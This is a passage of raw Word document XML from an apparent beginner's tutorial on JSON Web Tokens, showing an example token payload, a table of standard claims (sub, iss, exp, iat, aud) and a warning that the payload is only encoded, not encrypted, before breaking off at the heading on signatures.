              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0E1521" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="20"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="20"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="4D6080"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  "userId": </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="66C2FF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">101</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFD27A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">,            </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="4D6080"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">// Who is this user</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0E1521" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="20"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="20"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="4D6080"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  "role": </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFD27A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">"user"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFD27A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">,          </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="4D6080"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">// Their access level</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0E1521" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="20"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="20"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="4D6080"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  "exp": </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="66C2FF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">1700000000</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFD27A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">,       </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="4D6080"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">// Expiry (Unix timestamp)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0E1521" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="20"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="20"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="4D6080"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  "iat": </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="66C2FF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">1699990000</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFD27A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="4D6080"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">// Issued at (when created)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0E1521" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="20"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="20"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFD27A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">}</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5760"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="555555" w:sz="4"/>
              <w:left w:val="single" w:color="555555" w:sz="4"/>
              <w:bottom w:val="single" w:color="555555" w:sz="4"/>
              <w:right w:val="single" w:color="555555" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="0D1B3E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Claim</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="555555" w:sz="4"/>
              <w:left w:val="single" w:color="555555" w:sz="4"/>
              <w:bottom w:val="single" w:color="555555" w:sz="4"/>
              <w:right w:val="single" w:color="555555" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="0D1B3E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5760"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="555555" w:sz="4"/>
              <w:left w:val="single" w:color="555555" w:sz="4"/>
              <w:bottom w:val="single" w:color="555555" w:sz="4"/>
              <w:right w:val="single" w:color="555555" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="0D1B3E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">What it means</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E8EDF8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0066CC"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">sub</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E8EDF8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Subject</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5760"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E8EDF8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">The user this token is about (usually user ID)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="144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pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0066CC"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">iss</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="21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pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Issuer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="57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pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Which server/app created this token</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E8EDF8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0066CC"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">exp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E8EDF8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Expiry</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5760"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E8EDF8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">When the token stops being valid (Unix timestamp)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="144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pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0066CC"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">iat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="21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pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Issued At</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="57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pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">When the token was created</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E8EDF8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0066CC"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">aud</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E8EDF8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Audience</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5760"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E8EDF8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Which service this token is meant for</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0022" w:sz="4"/>
              <w:left w:val="single" w:color="CC0022" w:sz="24"/>
              <w:bottom w:val="single" w:color="CC0022" w:sz="4"/>
              <w:right w:val="single" w:color="CC0022" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FDECEA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="CC0022"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">⚠️  CRITICAL — Payload is NOT Encrypted!</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="50" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">The payload is Base64URL encoded. This is REVERSIBLE — anyone who has your token can decode the payload and read it.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="50" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">NEVER store passwords, credit card numbers, or other secrets in the payload.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Only store information that is safe to be read publicly: user ID, role, expiry.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00875A"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve">Part 3: The Signature — The Tamper-Proof Seal</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
